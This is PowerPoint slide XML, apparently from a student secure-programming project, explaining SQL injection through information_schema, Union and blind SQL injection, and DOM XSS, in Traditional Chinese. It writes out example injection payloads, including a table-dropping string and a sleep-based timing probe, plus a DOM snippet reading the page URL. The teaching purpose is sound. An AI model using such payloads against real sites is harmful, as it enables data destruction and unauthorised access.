      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36916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C86DF-7DE3-CF22-C9BD-4AF0D6D6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攻擊流程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818BD24-5731-7C5B-0B62-B70F13963816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="2209870"/>
            <a:ext cx="1102961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" altLang="zh-TW" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" b="1" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>nformation_schema</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/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MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en" sz="2000" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、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Microsoft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與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Postgre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等等的資料庫軟體，會透過一個叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema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的資料庫儲存各資料庫的資訊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" altLang="zh-TW" sz="2000" b="1" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2000" b="1" i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-ea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altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>schema_name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記錄所有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schema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的名稱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TW" sz="2000" b="1" i="0" u="none" strike="noStrike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" altLang="zh-TW" sz="2000" b="1" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2000" b="1" i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-ea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altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_name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記錄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table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的名稱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altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_schema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記錄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table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對應的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schema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名稱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" altLang="zh-TW" sz="2000" b="1" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2000" b="1" i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-ea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altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>column_name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記錄所有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column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的名稱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altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_name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記錄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column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對應的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>名稱</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1701838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D754E5-A8D7-D031-E15D-B5AFCD87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DEMO</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
              <a:t>影片</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="線上媒體 2" descr="安全程式設計-期末專案-Union Attack">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ADAE90-186C-D2B5-5C8A-CD03B550D65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1673" y="2340749"/>
            <a:ext cx="6108654" cy="345139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A83E437-3661-A75C-ACD0-6328EF4DF9BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3041673" y="579213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>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://youtu.be/s1wS0aHIij4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9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1B6EFEE-4966-DB3F-0EF4-F286FF60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/>
              <a:t>blind SQL injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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B0ACBEF-3B4F-67D3-9076-AF2AB69A7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385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433D402-CAF3-44D8-D294-96ECB4E8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微軟正黑體"/>
              </a:rPr>
              <a:t>什麼是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>BLIND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t> SQL INJECTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW">
                <a:ea typeface="+mj-lt"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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926D49C-8FBB-278C-47C6-851CC0DEC0BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592398" y="2258937"/>
            <a:ext cx="11029615" cy="36783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" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>HTTP responses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t> 中沒有有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>回應或錯誤訊息時</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT"/>
              <a:ea typeface="微軟正黑體"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>攻擊方式可分2類</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="899795" lvl="2" indent="-269875"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>Content-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1601470" lvl="4" indent="-269875"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>例:輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="E33671"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="E33671"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="E3367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; DROP table USERS ;--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="E3367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sz="2600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>再Query資料表內容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="899795" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>Time-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1601470" lvl="4" indent="-269875"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>例:輸入「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="E33671"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>1' and sleep(5)#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t>觀察網站是否在等待</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="E33671"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Microsoft JhengHei UI"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="E33671"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Microsoft JhengHei U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7979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AFA0D-BBC0-29B8-16E7-85AAC02E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DEMO </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
              <a:t>影片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B84ACE-FE60-E04A-2C09-E2FEE6442556}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3041673" y="575901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>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://youtu.be/CbQK_o6gewg</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="線上媒體 4" descr="安全程式設計-期末專案-Blind SQL Injection">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69AD525-2B7A-A20F-F002-94F50D10E7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1673" y="2307620"/>
            <a:ext cx="6108654" cy="34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8D88CF4-67EA-390A-3A61-D87E850A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DOM XSS</a:t>
            </a:r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413169-703E-3792-FF33-EA94B863F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44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D3DB3-DBDA-BBA2-62E9-8B65716C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什麼是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW"/>
              <a:t>DOM?</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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CDD67D-0464-4A63-A1A3-899753AB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09" y="1868251"/>
            <a:ext cx="4648186" cy="254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3AE681-05C9-C3AE-6EEF-6ECF74701C3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3835089" y="4377914"/>
            <a:ext cx="4511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https://ithelp.ithome.com.tw/articles/10202689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05D92A-25CB-DE6D-C908-2078A0325B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368231" y="4759672"/>
            <a:ext cx="94449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TW" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/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DOM(Document Object Model)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/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是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/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HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/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SVG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/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等文件的程式介面，提供文件結構化表示的方法，且定義讓程式可以存取並改變文件架構、內容的方法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TW" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/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常常透過 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Microsoft JhengHei UI" panose="020B0400000000000000" pitchFamily="34" charset="-120"/>
                <a:ea typeface="Microsoft JhengHei UI" panose="020B0400000000000000" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> 來存取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Microsoft JhengHei UI" panose="020B0400000000000000" pitchFamily="34" charset="-120"/>
              <a:ea typeface="Microsoft JhengHei UI" panose="020B0400000000000000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altLang="zh-TW" sz="20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EX1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>cool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9A6E3A"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DD4A68"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'cool’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DD4A68"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>innerText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW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0404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D2502D-AFE4-6450-4E23-7F69FB36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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
              <a:t>的弱點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75AA2A3-5042-D783-286F-219E59ADE2FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="1940130"/>
            <a:ext cx="11029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假如網站沒有做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="20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input validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en" sz="20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zh-TW" altLang="en-US" sz="20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可能會使網站的功能變成漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="20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A12EEB5-574C-CF98-7D6C-ABCA465BF9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="575894" y="2600708"/>
            <a:ext cx="11484927" cy="4465721"/>
            <a:chOff x="575894" y="2600708"/>
            <a:chExt cx="11484927" cy="446572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ED94BC2-B8BC-1743-45A6-105791BD5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4" y="2600708"/>
              <a:ext cx="7838901" cy="2034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CD2EA3A-3D0A-B98C-08CC-BDF36007BAFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5015724" y="3687720"/>
              <a:ext cx="7045097" cy="3378709"/>
              <a:chOff x="4988689" y="3914018"/>
              <a:chExt cx="7203311" cy="2802333"/>
            </a:xfrm>
          </p:grpSpPr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DE8B69A-8237-F006-496F-14143567C1D6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4988689" y="4408027"/>
                <a:ext cx="720331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>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>&lt;</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>html&gt; </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>	&lt;h1 id=</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:solidFill>
                      <a:srgbClr val="DF5000"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>'name'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>&gt;Hello&lt;/h1&gt; </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW"/>
                  <a:t>	</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>&lt;script&gt; </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:solidFill>
                      <a:srgbClr val="A71D5D"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>		var</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW" err="1">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>url</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> = </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:solidFill>
                      <a:srgbClr val="A71D5D"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>new</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> URL(</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW" err="1">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>window.location.href</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>);</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en" altLang="zh-TW">
                    <a:solidFill>
                      <a:srgbClr val="A71D5D"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>		</a:t>
                </a:r>
                <a:r>
